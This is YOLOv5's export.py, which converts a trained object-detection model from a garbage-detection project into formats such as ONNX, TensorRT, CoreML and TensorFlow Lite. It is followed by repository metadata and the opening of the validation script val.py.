FlatWhite233_yolov5_garbage_detect/yolov5_garbage_detect-backend/export.py
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license """ Export a YOLOv5 PyTorch model to other formats. TensorFlow exports authored by https://github.com/zldrobit Format | `export.py --include` | Model --- | --- | --- PyTorch | - | yolov5s.pt TorchScript | `torchscript` | yolov5s.torchscript ONNX | `onnx` | yolov5s.onnx OpenVINO | `openvino` | yolov5s_openvino_model/ TensorRT | `engine` | yolov5s.engine CoreML | `coreml` | yolov5s.mlmodel TensorFlow SavedModel | `saved_model` | yolov5s_saved_model/ TensorFlow GraphDef | `pb` | yolov5s.pb TensorFlow Lite | `tflite` | yolov5s.tflite TensorFlow Edge TPU | `edgetpu` | yolov5s_edgetpu.tflite TensorFlow.js | `tfjs` | yolov5s_web_model/ Requirements: $ pip install -r requirements.txt coremltools onnx onnx-simplifier onnxruntime openvino-dev tensorflow-cpu # CPU $ pip install -r requirements.txt coremltools onnx onnx-simplifier onnxruntime-gpu openvino-dev tensorflow # GPU Usage: $ python path/to/export.py --weights yolov5s.pt --include torchscript onnx openvino engine coreml tflite ... Inference: $ python path/to/detect.py --weights yolov5s.pt # PyTorch yolov5s.torchscript # TorchScript yolov5s.onnx # ONNX Runtime or OpenCV DNN with --dnn yolov5s.xml # OpenVINO yolov5s.engine # TensorRT yolov5s.mlmodel # CoreML (macOS-only) yolov5s_saved_model # TensorFlow SavedModel yolov5s.pb # TensorFlow GraphDef yolov5s.tflite # TensorFlow Lite yolov5s_edgetpu.tflite # TensorFlow Edge TPU TensorFlow.js: $ cd .. && git clone https://github.com/zldrobit/tfjs-yolov5-example.git && cd tfjs-yolov5-example $ npm install $ ln -s ../../yolov5/yolov5s_web_model public/yolov5s_web_model $ npm start """ import argparse import json import os import platform import subprocess import sys import time import warnings from pathlib import Path import pandas as pd import torch import yaml from torch.utils.mobile_optimizer import optimize_for_mobile FILE = Path(__file__).resolve() ROOT = FILE.parents[0] # YOLOv5 root directory if str(ROOT) not in sys.path: sys.path.append(str(ROOT)) # add ROOT to PATH if platform.system() != 'Windows': ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative from models.experimental import attempt_load from models.yolo import Detect from utils.dataloaders import LoadImages from utils.general import (LOGGER, check_dataset, check_img_size, check_requirements, check_version, check_yaml, colorstr, file_size, print_args, url2file) from utils.torch_utils import select_device, smart_inference_mode def export_formats(): # YOLOv5 export formats x = [ ['PyTorch', '-', '.pt', True, True], ['TorchScript', 'torchscript', '.torchscript', True, True], ['ONNX', 'onnx', '.onnx', True, True], ['OpenVINO', 'openvino', '_openvino_model', True, False], ['TensorRT', 'engine', '.engine', False, True], ['CoreML', 'coreml', '.mlmodel', True, False], ['TensorFlow SavedModel', 'saved_model', '_saved_model', True, True], ['TensorFlow GraphDef', 'pb', '.pb', True, True], ['TensorFlow Lite', 'tflite', '.tflite', True, False], ['TensorFlow Edge TPU', 'edgetpu', '_edgetpu.tflite', False, False], ['TensorFlow.js', 'tfjs', '_web_model', False, False],] return pd.DataFrame(x, columns=['Format', 'Argument', 'Suffix', 'CPU', 'GPU']) def export_torchscript(model, im, file, optimize, prefix=colorstr('TorchScript:')): # YOLOv5 TorchScript model export try: LOGGER.info(f'\n{prefix} starting export with torch {torch.__version__}...') f = file.with_suffix('.torchscript') ts = torch.jit.trace(model, im, strict=False) d = {"shape": im.shape, "stride": int(max(model.stride)), "names": model.names} extra_files = {'config.txt': json.dumps(d)} # torch._C.ExtraFilesMap() if optimize: # https://pytorch.org/tutorials/recipes/mobile_interpreter.html optimize_for_mobile(ts)._save_for_lite_interpreter(str(f), _extra_files=extra_files) else: ts.save(str(f), _extra_files=extra_files) LOGGER.info(f'{prefix} export success, saved as {f} ({file_size(f):.1f} MB)') return f except Exception as e: LOGGER.info(f'{prefix} export failure: {e}') def export_onnx(model, im, file, opset, train, dynamic, simplify, prefix=colorstr('ONNX:')): # YOLOv5 ONNX export try: check_requirements(('onnx',)) import onnx LOGGER.info(f'\n{prefix} starting export with onnx {onnx.__version__}...') f = file.with_suffix('.onnx') torch.onnx.export( model.cpu() if dynamic else model, # --dynamic only compatible with cpu im.cpu() if dynamic else im, f, verbose=False, opset_version=opset, training=torch.onnx.TrainingMode.TRAINING if train else torch.onnx.TrainingMode.EVAL, do_constant_folding=not train, input_names=['images'], output_names=['output'], dynamic_axes={ 'images': { 0: 'batch', 2: 'height', 3: 'width'}, # shape(1,3,640,640) 'output': { 0: 'batch', 1: 'anchors'} # shape(1,25200,85) } if dynamic else None) # Checks model_onnx = onnx.load(f) # load onnx model onnx.checker.check_model(model_onnx) # check onnx model # Metadata d = {'stride': int(max(model.stride)), 'names': model.names} for k, v in d.items(): meta = model_onnx.metadata_props.add() meta.key, meta.value = k, str(v) onnx.save(model_onnx, f) # Simplify if simplify: try: cuda = torch.cuda.is_available() check_requirements(('onnxruntime-gpu' if cuda else 'onnxruntime', 'onnx-simplifier>=0.4.1')) import onnxsim LOGGER.info(f'{prefix} simplifying with onnx-simplifier {onnxsim.__version__}...') model_onnx, check = onnxsim.simplify(model_onnx) assert check, 'assert check failed' onnx.save(model_onnx, f) except Exception as e: LOGGER.info(f'{prefix} simplifier failure: {e}') LOGGER.info(f'{prefix} export success, saved as {f} ({file_size(f):.1f} MB)') return f except Exception as e: LOGGER.info(f'{prefix} export failure: {e}') def export_openvino(model, file, half, prefix=colorstr('OpenVINO:')): # YOLOv5 OpenVINO export try: check_requirements(('openvino-dev',)) # requires openvino-dev: https://pypi.org/project/openvino-dev/ import openvino.inference_engine as ie LOGGER.info(f'\n{prefix} starting export with openvino {ie.__version__}...') f = str(file).replace('.pt', f'_openvino_model{os.sep}') cmd = f"mo --input_model {file.with_suffix('.onnx')} --output_dir {f} --data_type {'FP16' if half else 'FP32'}" subprocess.check_output(cmd.split()) # export with open(Path(f) / file.with_suffix('.yaml').name, 'w') as g: yaml.dump({'stride': int(max(model.stride)), 'names': model.names}, g) # add metadata.yaml LOGGER.info(f'{prefix} export success, saved as {f} ({file_size(f):.1f} MB)') return f except Exception as e: LOGGER.info(f'\n{prefix} export failure: {e}') def export_coreml(model, im, file, int8, half, prefix=colorstr('CoreML:')): # YOLOv5 CoreML export try: check_requirements(('coremltools',)) import coremltools as ct LOGGER.info(f'\n{prefix} starting export with coremltools {ct.__version__}...') f = file.with_suffix('.mlmodel') ts = torch.jit.trace(model, im, strict=False) # TorchScript model ct_model = ct.convert(ts, inputs=[ct.ImageType('image', shape=im.shape, scale=1 / 255, bias=[0, 0, 0])]) bits, mode = (8, 'kmeans_lut') if int8 else (16, 'linear') if half else (32, None) if bits < 32: if platform.system() == 'Darwin': # quantization only supported on macOS with warnings.catch_warnings(): warnings.filterwarnings("ignore", category=DeprecationWarning) # suppress numpy==1.20 float warning ct_model = ct.models.neural_network.quantization_utils.quantize_weights(ct_model, bits, mode) else: print(f'{prefix} quantization only supported on macOS, skipping...') ct_model.save(f) LOGGER.info(f'{prefix} export success, saved as {f} ({file_size(f):.1f} MB)') return ct_model, f except Exception as e: LOGGER.info(f'\n{prefix} export failure: {e}') return None, None def export_engine(model, im, file, train, half, dynamic, simplify, workspace=4, verbose=False): # YOLOv5 TensorRT export https://developer.nvidia.com/tensorrt prefix = colorstr('TensorRT:') try: assert im.device.type != 'cpu', 'export running on CPU but must be on GPU, i.e. `python export.py --device 0`' try: import tensorrt as trt except Exception: if platform.system() == 'Linux': check_requirements(('nvidia-tensorrt',), cmds=('-U --index-url https://pypi.ngc.nvidia.com',)) import tensorrt as trt if trt.__version__[0] == '7': # TensorRT 7 handling https://github.com/ultralytics/yolov5/issues/6012 grid = model.model[-1].anchor_grid model.model[-1].anchor_grid = [a[..., :1, :1, :] for a in grid] export_onnx(model, im, file, 12, train, dynamic, simplify) # opset 12 model.model[-1].anchor_grid = grid else: # TensorRT >= 8 check_version(trt.__version__, '8.0.0', hard=True) # require tensorrt>=8.0.0 export_onnx(model, im, file, 13, train, dynamic, simplify) # opset 13 onnx = file.with_suffix('.onnx') LOGGER.info(f'\n{prefix} starting export with TensorRT {trt.__version__}...') assert onnx.exists(), f'failed to export ONNX file: {onnx}' f = file.with_suffix('.engine') # TensorRT engine file logger = trt.Logger(trt.Logger.INFO) if verbose: logger.min_severity = trt.Logger.Severity.VERBOSE builder = trt.Builder(logger) config = builder.create_builder_config() config.max_workspace_size = workspace * 1 << 30 # config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, workspace << 30) # fix TRT 8.4 deprecation notice flag = (1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)) network = builder.create_network(flag) parser = trt.OnnxParser(network, logger) if not parser.parse_from_file(str(onnx)): raise RuntimeError(f'failed to load ONNX file: {onnx}') inputs = [network.get_input(i) for i in range(network.num_inputs)] outputs = [network.get_output(i) for i in range(network.num_outputs)] LOGGER.info(f'{prefix} Network Description:') for inp in inputs: LOGGER.info(f'{prefix}\tinput "{inp.name}" with shape {inp.shape} and dtype {inp.dtype}') for out in outputs: LOGGER.info(f'{prefix}\toutput "{out.name}" with shape {out.shape} and dtype {out.dtype}') if dynamic: if im.shape[0] <= 1: LOGGER.warning(f"{prefix}WARNING: --dynamic model requires maximum --batch-size argument") profile = builder.create_optimization_profile() for inp in inputs: profile.set_shape(inp.name, (1, *im.shape[1:]), (max(1, im.shape[0] // 2), *im.shape[1:]), im.shape) config.add_optimization_profile(profile) LOGGER.info(f'{prefix} building FP{16 if builder.platform_has_fast_fp16 and half else 32} engine in {f}') if builder.platform_has_fast_fp16 and half: config.set_flag(trt.BuilderFlag.FP16) with builder.build_engine(network, config) as engine, open(f, 'wb') as t: t.write(engine.serialize()) LOGGER.info(f'{prefix} export success, saved as {f} ({file_size(f):.1f} MB)') return f except Exception as e: LOGGER.info(f'\n{prefix} export failure: {e}') def export_saved_model(model, im, file, dynamic, tf_nms=False, agnostic_nms=False, topk_per_class=100, topk_all=100, iou_thres=0.45, conf_thres=0.25, keras=False, prefix=colorstr('TensorFlow SavedModel:')): # YOLOv5 TensorFlow SavedModel export try: import tensorflow as tf from tensorflow.python.framework.convert_to_constants import convert_variables_to_constants_v2 from models.tf import TFDetect, TFModel LOGGER.info(f'\n{prefix} starting export with tensorflow {tf.__version__}...') f = str(file).replace('.pt', '_saved_model') batch_size, ch, *imgsz = list(im.shape) # BCHW tf_model = TFModel(cfg=model.yaml, model=model, nc=model.nc, imgsz=imgsz) im = tf.zeros((batch_size, *imgsz, ch)) # BHWC order for TensorFlow _ = tf_model.predict(im, tf_nms, agnostic_nms, topk_per_class, topk_all, iou_thres, conf_thres) inputs = tf.keras.Input(shape=(*imgsz, ch), batch_size=None if dynamic else batch_size) outputs = tf_model.predict(inputs, tf_nms, agnostic_nms, topk_per_class, topk_all, iou_thres, conf_thres) keras_model = tf.keras.Model(inputs=inputs, outputs=outputs) keras_model.trainable = False keras_model.summary() if keras: keras_model.save(f, save_format='tf') else: spec = tf.TensorSpec(keras_model.inputs[0].shape, keras_model.inputs[0].dtype) m = tf.function(lambda x: keras_model(x)) # full model m = m.get_concrete_function(spec) frozen_func = convert_variables_to_constants_v2(m) tfm = tf.Module() tfm.__call__ = tf.function(lambda x: frozen_func(x)[:4] if tf_nms else frozen_func(x)[0], [spec]) tfm.__call__(im) tf.saved_model.save(tfm, f, options=tf.saved_model.SaveOptions(experimental_custom_gradients=False) if check_version(tf.__version__, '2.6') else tf.saved_model.SaveOptions()) LOGGER.info(f'{prefix} export success, saved as {f} ({file_size(f):.1f} MB)') return keras_model, f except Exception as e: LOGGER.info(f'\n{prefix} export failure: {e}') return None, None def export_pb(keras_model, file, prefix=colorstr('TensorFlow GraphDef:')): # YOLOv5 TensorFlow GraphDef *.pb export https://github.com/leimao/Frozen_Graph_TensorFlow try: import tensorflow as tf from tensorflow.python.framework.convert_to_constants import convert_variables_to_constants_v2 LOGGER.info(f'\n{prefix} starting export with tensorflow {tf.__version__}...') f = file.with_suffix('.pb') m = tf.function(lambda x: keras_model(x)) # full model m = m.get_concrete_function(tf.TensorSpec(keras_model.inputs[0].shape, keras_model.inputs[0].dtype)) frozen_func = convert_variables_to_constants_v2(m) frozen_func.graph.as_graph_def() tf.io.write_graph(graph_or_graph_def=frozen_func.graph, logdir=str(f.parent), name=f.name, as_text=False) LOGGER.info(f'{prefix} export success, saved as {f} ({file_size(f):.1f} MB)') return f except Exception as e: LOGGER.info(f'\n{prefix} export failure: {e}') def export_tflite(keras_model, im, file, int8, data, nms, agnostic_nms, prefix=colorstr('TensorFlow Lite:')): # YOLOv5 TensorFlow Lite export try: import tensorflow as tf LOGGER.info(f'\n{prefix} starting export with tensorflow {tf.__version__}...') batch_size, ch, *imgsz = list(im.shape) # BCHW f = str(file).replace('.pt', '-fp16.tflite') converter = tf.lite.TFLiteConverter.from_keras_model(keras_model) converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS] converter.target_spec.supported_types = [tf.float16] converter.optimizations = [tf.lite.Optimize.DEFAULT] if int8: from models.tf import representative_dataset_gen dataset = LoadImages(check_dataset(check_yaml(data))['train'], img_size=imgsz, auto=False) converter.representative_dataset = lambda: representative_dataset_gen(dataset, ncalib=100) converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS_INT8] converter.target_spec.supported_types = [] converter.inference_input_type = tf.uint8 # or tf.int8 converter.inference_output_type = tf.uint8 # or tf.int8 converter.experimental_new_quantizer = True f = str(file).replace('.pt', '-int8.tflite') if nms or agnostic_nms: converter.target_spec.supported_ops.append(tf.lite.OpsSet.SELECT_TF_OPS) tflite_model = converter.convert() open(f, "wb").write(tflite_model) LOGGER.info(f'{prefix} export success, saved as {f} ({file_size(f):.1f} MB)') return f except Exception as e: LOGGER.info(f'\n{prefix} export failure: {e}') def export_edgetpu(file, prefix=colorstr('Edge TPU:')): # YOLOv5 Edge TPU export https://coral.ai/docs/edgetpu/models-intro/ try: cmd = 'edgetpu_compiler --version' help_url = 'https://coral.ai/docs/edgetpu/compiler/' assert platform.system() == 'Linux', f'export only supported on Linux. See {help_url}' if subprocess.run(f'{cmd} >/dev/null', shell=True).returncode != 0: LOGGER.info(f'\n{prefix} export requires Edge TPU compiler. Attempting install from {help_url}') sudo = subprocess.run('sudo --version >/dev/null', shell=True).returncode == 0 # sudo installed on system for c in ( 'curl https://packages.cloud.google.com/apt/doc/apt-key.gpg | sudo apt-key add -', 'echo "deb https://packages.cloud.google.com/apt coral-edgetpu-stable main" | sudo tee /etc/apt/sources.list.d/coral-edgetpu.list', 'sudo apt-get update', 'sudo apt-get install edgetpu-compiler'): subprocess.run(c if sudo else c.replace('sudo ', ''), shell=True, check=True) ver = subprocess.run(cmd, shell=True, capture_output=True, check=True).stdout.decode().split()[-1] LOGGER.info(f'\n{prefix} starting export with Edge TPU compiler {ver}...') f = str(file).replace('.pt', '-int8_edgetpu.tflite') # Edge TPU model f_tfl = str(file).replace('.pt', '-int8.tflite') # TFLite model cmd = f"edgetpu_compiler -s -d -k 10 --out_dir {file.parent} {f_tfl}" subprocess.run(cmd.split(), check=True) LOGGER.info(f'{prefix} export success, saved as {f} ({file_size(f):.1f} MB)') return f except Exception as e: LOGGER.info(f'\n{prefix} export failure: {e}') def export_tfjs(file, prefix=colorstr('TensorFlow.js:')): # YOLOv5 TensorFlow.js export try: check_requirements(('tensorflowjs',)) import re import tensorflowjs as tfjs LOGGER.info(f'\n{prefix} starting export with tensorflowjs {tfjs.__version__}...') f = str(file).replace('.pt', '_web_model') # js dir f_pb = file.with_suffix('.pb') # *.pb path f_json = f'{f}/model.json' # *.json path cmd = f'tensorflowjs_converter --input_format=tf_frozen_model ' \ f'--output_node_names=Identity,Identity_1,Identity_2,Identity_3 {f_pb} {f}' subprocess.run(cmd.split()) with open(f_json) as j: json = j.read() with open(f_json, 'w') as j: # sort JSON Identity_* in ascending order subst = re.sub( r'{"outputs": {"Identity.?.?": {"name": "Identity.?.?"}, ' r'"Identity.?.?": {"name": "Identity.?.?"}, ' r'"Identity.?.?": {"name": "Identity.?.?"}, ' r'"Identity.?.?": {"name": "Identity.?.?"}}}', r'{"outputs": {"Identity": {"name": "Identity"}, ' r'"Identity_1": {"name": "Identity_1"}, ' r'"Identity_2": {"name": "Identity_2"}, ' r'"Identity_3": {"name": "Identity_3"}}}', json) j.write(subst) LOGGER.info(f'{prefix} export success, saved as {f} ({file_size(f):.1f} MB)') return f except Exception as e: LOGGER.info(f'\n{prefix} export failure: {e}') @smart_inference_mode() def run( data=ROOT / 'data/coco128.yaml', # 'dataset.yaml path' weights=ROOT / 'yolov5s.pt', # weights path imgsz=(640, 640), # image (height, width) batch_size=1, # batch size device='cpu', # cuda device, i.e. 0 or 0,1,2,3 or cpu include=('torchscript', 'onnx'), # include formats half=False, # FP16 half-precision export inplace=False, # set YOLOv5 Detect() inplace=True train=False, # model.train() mode keras=False, # use Keras optimize=False, # TorchScript: optimize for mobile int8=False, # CoreML/TF INT8 quantization dynamic=False, # ONNX/TF/TensorRT: dynamic axes simplify=False, # ONNX: simplify model opset=12, # ONNX: opset version verbose=False, # TensorRT: verbose log workspace=4, # TensorRT: workspace size (GB) nms=False, # TF: add NMS to model agnostic_nms=False, # TF: add agnostic NMS to model topk_per_class=100, # TF.js NMS: topk per class to keep topk_all=100, # TF.js NMS: topk for all classes to keep iou_thres=0.45, # TF.js NMS: IoU threshold conf_thres=0.25, # TF.js NMS: confidence threshold ): t = time.time() include = [x.lower() for x in include] # to lowercase fmts = tuple(export_formats()['Argument'][1:]) # --include arguments flags = [x in include for x in fmts] assert sum(flags) == len(include), f'ERROR: Invalid --include {include}, valid --include arguments are {fmts}' jit, onnx, xml, engine, coreml, saved_model, pb, tflite, edgetpu, tfjs = flags # export booleans file = Path(url2file(weights) if str(weights).startswith(('http:/', 'https:/')) else weights) # PyTorch weights # Load PyTorch model device = select_device(device) if half: assert device.type != 'cpu' or coreml, '--half only compatible with GPU export, i.e. use --device 0' assert not dynamic, '--half not compatible with --dynamic, i.e. use either --half or --dynamic but not both' model = attempt_load(weights, device=device, inplace=True, fuse=True) # load FP32 model # Checks imgsz *= 2 if len(imgsz) == 1 else 1 # expand if optimize: assert device.type == 'cpu', '--optimize not compatible with cuda devices, i.e. use --device cpu' # Input gs = int(max(model.stride)) # grid size (max stride) imgsz = [check_img_size(x, gs) for x in imgsz] # verify img_size are gs-multiples im = torch.zeros(batch_size, 3, *imgsz).to(device) # image size(1,3,320,192) BCHW iDetection # Update model model.train() if train else model.eval() # training mode = no Detect() layer grid construction for k, m in model.named_modules(): if isinstance(m, Detect): m.inplace = inplace m.onnx_dynamic = dynamic m.export = True for _ in range(2): y = model(im) # dry runs if half and not coreml: im, model = im.half(), model.half() # to FP16 shape = tuple((y[0] if isinstance(y, tuple) else y).shape) # model output shape LOGGER.info(f"\n{colorstr('PyTorch:')} starting from {file} with output shape {shape} ({file_size(file):.1f} MB)") # Exports f = [''] * 10 # exported filenames warnings.filterwarnings(action='ignore', category=torch.jit.TracerWarning) # suppress TracerWarning if jit: f[0] = export_torchscript(model, im, file, optimize) if engine: # TensorRT required before ONNX f[1] = export_engine(model, im, file, train, half, dynamic, simplify, workspace, verbose) if onnx or xml: # OpenVINO requires ONNX f[2] = export_onnx(model, im, file, opset, train, dynamic, simplify) if xml: # OpenVINO f[3] = export_openvino(model, file, half) if coreml: _, f[4] = export_coreml(model, im, file, int8, half) # TensorFlow Exports if any((saved_model, pb, tflite, edgetpu, tfjs)): if int8 or edgetpu: # TFLite --int8 bug https://github.com/ultralytics/yolov5/issues/5707 check_requirements(('flatbuffers==1.12',)) # required before `import tensorflow` assert not tflite or not tfjs, 'TFLite and TF.js models must be exported separately, please pass only one type.' model, f[5] = export_saved_model(model.cpu(), im, file, dynamic, tf_nms=nms or agnostic_nms or tfjs, agnostic_nms=agnostic_nms or tfjs, topk_per_class=topk_per_class, topk_all=topk_all, iou_thres=iou_thres, conf_thres=conf_thres, keras=keras) if pb or tfjs: # pb prerequisite to tfjs f[6] = export_pb(model, file) if tflite or edgetpu: f[7] = export_tflite(model, im, file, int8=int8 or edgetpu, data=data, nms=nms, agnostic_nms=agnostic_nms) if edgetpu: f[8] = export_edgetpu(file) if tfjs: f[9] = export_tfjs(file) # Finish f = [str(x) for x in f if x] # filter out '' and None if any(f): h = '--half' if half else '' # --half FP16 inference arg LOGGER.info(f'\nExport complete ({time.time() - t:.2f}s)' f"\nResults saved to {colorstr('bold', file.parent.resolve())}" f"\nDetect: python detect.py --weights {f[-1]} {h}" f"\nValidate: python val.py --weights {f[-1]} {h}" f"\nPyTorch Hub: model = torch.hub.load('ultralytics/yolov5', 'custom', '{f[-1]}')" f"\nVisualize: https://netron.app") return f # return list of exported files/dirs def parse_opt(): parser = argparse.ArgumentParser() parser.add_argument('--data', type=str, default=ROOT / 'data/coco128.yaml', help='dataset.yaml path') parser.add_argument('--weights', nargs='+', type=str, default=ROOT / 'yolov5s.pt', help='model.pt path(s)') parser.add_argument('--imgsz', '--img', '--img-size', nargs='+', type=int, default=[640, 640], help='image (h, w)') parser.add_argument('--batch-size', type=int, default=1, help='batch size') parser.add_argument('--device', default='cpu', help='cuda device, i.e. 0 or 0,1,2,3 or cpu') parser.add_argument('--half', action='store_true', help='FP16 half-precision export') parser.add_argument('--inplace', action='store_true', help='set YOLOv5 Detect() inplace=True') parser.add_argument('--train', action='store_true', help='model.train() mode') parser.add_argument('--keras', action='store_true', help='TF: use Keras') parser.add_argument('--optimize', action='store_true', help='TorchScript: optimize for mobile') parser.add_argument('--int8', action='store_true', help='CoreML/TF INT8 quantization') parser.add_argument('--dynamic', action='store_true', help='ONNX/TF/TensorRT: dynamic axes') parser.add_argument('--simplify', action='store_true', help='ONNX: simplify model') parser.add_argument('--opset', type=int, default=12, help='ONNX: opset version') parser.add_argument('--verbose', action='store_true', help='TensorRT: verbose log') parser.add_argument('--workspace', type=int, default=4, help='TensorRT: workspace size (GB)') parser.add_argument('--nms', action='store_true', help='TF: add NMS to model') parser.add_argument('--agnostic-nms', action='store_true', help='TF: add agnostic NMS to model') parser.add_argument('--topk-per-class', type=int, default=100, help='TF.js NMS: topk per class to keep') parser.add_argument('--topk-all', type=int, default=100, help='TF.js NMS: topk for all classes to keep') parser.add_argument('--iou-thres', type=float, default=0.45, help='TF.js NMS: IoU threshold') parser.add_argument('--conf-thres', type=float, default=0.25, help='TF.js NMS: confidence threshold') parser.add_argument('--include', nargs='+', default=['torchscript', 'onnx'], help='torchscript, onnx, openvino, engine, coreml, saved_model, pb, tflite, edgetpu, tfjs') opt = parser.parse_args() print_args(vars(opt)) return opt def main(opt): for opt.weights in (opt.weights if isinstance(opt.weights, list) else [opt.weights]): run(**vars(opt)) if __name__ == "__main__": opt = parse_opt() main(opt)
30,582
Python
.py
531
47.195857
151
0.595975
FlatWhite233/yolov5_garbage_detect
8
1
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,496
val.py
FlatWhite233_yolov5_garbage_detect/yolov5_garbage_detect-backend/val.py
# YOLOv5 üöÄ by Ultralytics, GPL-3.0 license """ Validate a trained YOLOv5 model accuracy on a custom dataset Usage: $ python path/to/val.py --weights yolov5s.pt --data coco128.yaml --img 640 Usage - formats: $ python path/to/val.py --weights yolov5s.pt # PyTorch yolov5s.torchscript # TorchScript yolov5s.onnx # ONNX Runtime or OpenCV DNN with --dnn yolov5s.xml # OpenVINO yolov5s.engine # TensorRT yolov5s.mlmodel # CoreML (macOS-only) yolov5s_saved_model # TensorFlow SavedModel yolov5s.pb # TensorFlow GraphDef yolov5s.tflite # TensorFlow Lite yolov5s_edgetpu.tflite # TensorFlow Edge TPU """ import argparse import json import os import sys from pathlib import Path import numpy as np import torch from tqdm import tqdm FILE = Path(__file__).resolve() ROOT = FILE.parents[0] # YOLOv5 root directory if str(ROOT) not in sys.path: sys.path.append(str(ROOT)) # add ROOT to PATH ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative from models.common import DetectMultiBackend from utils.callbacks import Callbacks from utils.dataloaders import create_dataloader from utils.general import (LOGGER, check_dataset, check_img_size, check_requirements, check_yaml, coco80_to_coco91_class, colorstr, increment_path, non_max_suppression, print_args, scale_coords, xywh2xyxy, xyxy2xywh) from utils.metrics import ConfusionMatrix, ap_per_class, box_iou from utils.plots import output_to_target, plot_images, plot_val_study from utils.torch_utils import select_device, smart_inference_mode, time_sync def save_one_txt(predn, save_conf, shape, file): # Save one txt result gn = torch.tensor(shape)[[1, 0, 1, 0]] # normalization gain whwh for *xyxy, conf, cls in predn.tolist(): xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format with open(file, 'a') as f: f.write(('%g ' * len(line)).rstrip() % line + '\n') def save_one_json(predn, jdict, path, class_map): # Save one JSON result {"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236} image_id = int(path.stem) if path.stem.isnumeric() else path.stem box = xyxy2xywh(predn[:, :4]) # xywh box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner for p, b in zip(predn.tolist(), box.tolist()): jdict.append({ 'image_id': image_id, 'category_id': class_map[int(p[5])], 'bbox': [round(x, 3) for x in b], 'score': round(p[4], 5)}) def process_batch(detections, labels, iouv): """ Return correct predictions matrix. Both sets of boxes are in (x1, y1, x2, y2) format. Arguments: detections (Array[N, 6]), x1, y1, x2, y2, conf, class labels (Array[M, 5]), class, x1, y1, x2, y2 Returns: correct (Array[N, 10]), for 10 IoU levels """ correct = np.zeros((detections.shape[0], iouv.shape[0])).astype(bool) iou = box_iou(labels[:, 1:], detections[:, :4]) correct_class = labels[:, 0:1] == detections[:, 5] for i in range(len(iouv)): x = torch.where((iou >= iouv[i]) & correct_class) # IoU > threshold and classes match if x[0].shape[0]: matches = torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy() # [label, detect, iou] if x[0].shape[0] > 1: matches = matches[matches[:, 2].argsort()[::-1]] matches = matches[np.unique(matches[:, 1], return_index=True)[1]] # matches = matches[matches[:, 2].argsort()[::-1]] matches = matches[np.unique(matches[:, 0], return_index=True)[1]] correct[matches[:, 1].astype(int), i] = True return torch.tensor(correct, dtype=torch.bool, device=iouv.device) @smart_inference_mode() def run( data, weights=None, # model.pt path(s) batch_size=32, # batch size imgsz=640, # inference size (pixels) conf_thres=0.001, # confidence threshold iou_thres=0.6, # NMS IoU threshold task='val', # train, val, test, speed or study device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu workers=8, # max dataloader workers (per RANK in DDP mode) single_cls=False, # treat as single-class dataset augment=False, # augmented inference verbose=False, # verbose output save_txt=False, # save results to *.txt save_hybrid=False, # save label+prediction hybrid results to *.txt save_conf=False, # save confidences in --save-txt labels save_json=False, # save a COCO-JSON results file project=ROOT / 'runs/val', # save to project/name name='exp', # save to project/name exist_ok=False, # existing project/name ok, do not increment half=True, # use FP16 half-precision inference dnn=False, # use OpenCV DNN for ONNX inference model=None, dataloader=None, save_dir=Path(''), plots=True, callbacks=Callbacks(), compute_loss=None, ): # Initialize/load model and set device training = model is not None if training: # called by train.py device, pt, jit, engine = next(model.parameters()).device, True, False, False # get model device, PyTorch model half &= device.type != 'cpu' # half precision only supported on CUDA model.half() if half else model.float() else: # called directly device = select_device(device, batch_size=batch_size) # Directories save_dir = increment_path(Path(project) / name, exist_ok=exist_ok) # increment run (save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir # Load model model = DetectMultiBackend(weights, device=device, dnn=dnn, data=data, fp16=half) stride, pt, jit, engine = model.stride, model.pt, model.jit, model.engine imgsz = check_img_size(imgsz, s=stride) # check image size half = model.fp16 # FP16 supported on limited backends with CUDA if engine: batch_size = model.batch_size else: device = model.device if not (pt or jit): batch_size = 1 # export.py models default to batch-size 1 LOGGER.info(f'Forcing --batch-size 1 square inference (1,3,{imgsz},{imgsz}) for non-PyTorch models') # Data data = check_dataset(data) # check # Configure model.eval() cuda = device.type != 'cpu' is_coco = isinstance(data.get('val'), str) and data['val'].endswith(f'coco{os.sep}val2017.txt') # COCO dataset nc = 1 if single_cls else int(data['nc']) # number of classes iouv = torch.linspace(0.5, 0.95, 10, device=device) # iou vector for [email protected]:0.95 niou = iouv.numel() # Dataloader if not training: if pt and not single_cls: # check --weights are trained on --data ncm = model.model.nc assert ncm == nc, f'{weights} ({ncm} classes) trained on different --data than what you passed ({nc} ' \ f'classes). Pass correct combination of --weights and --data that are trained together.' model.warmup(imgsz=(1 if pt else batch_size, 3, imgsz, imgsz)) # warmup pad = 0.0 if task in ('speed', 'benchmark') else 0.5 rect = False if task == 'benchmark' else pt # square inference for benchmarks task = task if task in ('train', 'val', 'test') else 'val' # path to train/val/test images dataloader = create_dataloader(data[task], imgsz, batch_size, stride, single_cls, pad=pad, rect=rect, workers=workers, prefix=colorstr(f'{task}: '))[0] seen = 0 confusion_matrix = ConfusionMatrix(nc=nc) names = dict(enumerate(model.names if hasattr(model, 'names') else model.module.names)) class_map = coco80_to_coco91_class() if is_coco else list(range(1000)) s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', '[email protected]', '[email protected]:.95') dt, p, r, f1, mp, mr, map50, map = [0.0, 0.0, 0.0], 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 loss = torch.zeros(3, device=device) jdict, stats, ap, ap_class = [], [], [], [] callbacks.run('on_val_start') pbar = tqdm(dataloader, desc=s, bar_format='{l_bar}{bar:10}{r_bar}{bar:-10b}') # progress bar for batch_i, (im, targets, paths, shapes) in enumerate(pbar): callbacks.run('on_val_batch_start') t1 = 